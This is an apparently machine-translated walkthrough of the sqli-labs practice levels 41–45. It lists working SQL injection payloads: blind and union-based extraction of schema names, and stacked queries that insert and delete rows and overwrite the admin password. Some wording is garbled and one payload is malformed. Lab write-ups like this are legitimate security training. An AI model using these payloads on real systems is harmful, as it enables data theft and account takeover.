SQL Lab (41~45) (continuous update later)

(41~45)

sql-lab-41

And 40 It's the same , Using stack injection , Time blind note , We found that it was just the different way of wrapping

1. Resolve table name ：?id=1’ and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e

2. Resolve field name ：?id=1’ and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i

therefore , We try to insert a statement ：

?id=1;insert into users(id,username,password)values(20,‘hcjtn’,‘1234’)-- q

We can also try to modify the statement we just inserted ：

?id=1 ;update users set username=‘tn’ where id=20-- q

Then try to eliminate it ：

?id=1;delete from users where id=20 – q

sql-lab-42

open 42 Turn off , We found that it is very similar to the previous secondary injection interface

At that time, we were new users , Use secondary injection to carry out a sql The ginseng , But this level does not allow us to create new users ,

So we need to find its injection point above ： When we're in password On the input ’or 1=1 – q

It is found that its injection point is password On

therefore , We can inject changes with stack admin password

First step ： Determine its table name and Name

Name of judgment table ：

’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ #

Found to have emails,referers,uagents,users Three tables

Judge the listing ：

’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’-- q

Find out users There are id,username,password Three column names

Then we use stack injection to change the administrator password ：

’ ;update users set password=‘hcjtn’ where username=‘admin’#-- q

Then input admin And password hcjtn I found that the landing was successful

sq-lab-43

and sql-lab-42 The same first segment injection point , stay password On the input ’)or 1=1# I found that the landing was successful It is found that the injection point is password On

43 Guan he 42 The difference of closing is only the difference of closing mode

The rest are exactly the same

The first is to judge the table name and column name ：

Name of judgment table ：

') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ #

Judge the listing ：

') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘security’ and table_name=‘users’#

Use stack injection to change the administrator password ：

1’);update users set password=‘hcjtn’ where username=‘admin’#

sql-lab-44

It's the same interface again ,

First judge the injection point when we are password On the input ’or 1=1 – q, I found that the landing was successful

Injection point ：password

This level and 42 The difference is ： There is no obvious visual sign of error reporting in this level

So we can only use Boolean blind note ：

Resolve library name ：

'or (ascii(substr((database()),1,1)))=115#

Description the first digit of the database name is s

'or (ascii(substr((database()),2,1)))=101#

Description the first digit of the database name is e

Name of judgment table ：

'or (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q

Found to have emails,referers,uagents,users Three tables

Judge the listing ：

'and (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q

Find out users There are id,username,password Three column names

And then change admin Password ：

';update set password=‘hcjtn’ where username=‘admin’#

Click , boring

sql-lab-45

The injection point is possword On ：’)or 1=1 #

Use time blind injection

1. Resolve database name ：’)or if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s

2. Resolve table name ： ')or if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e

3. Resolve field name ：’ )or if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i

4. get data : ')or (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q The first is i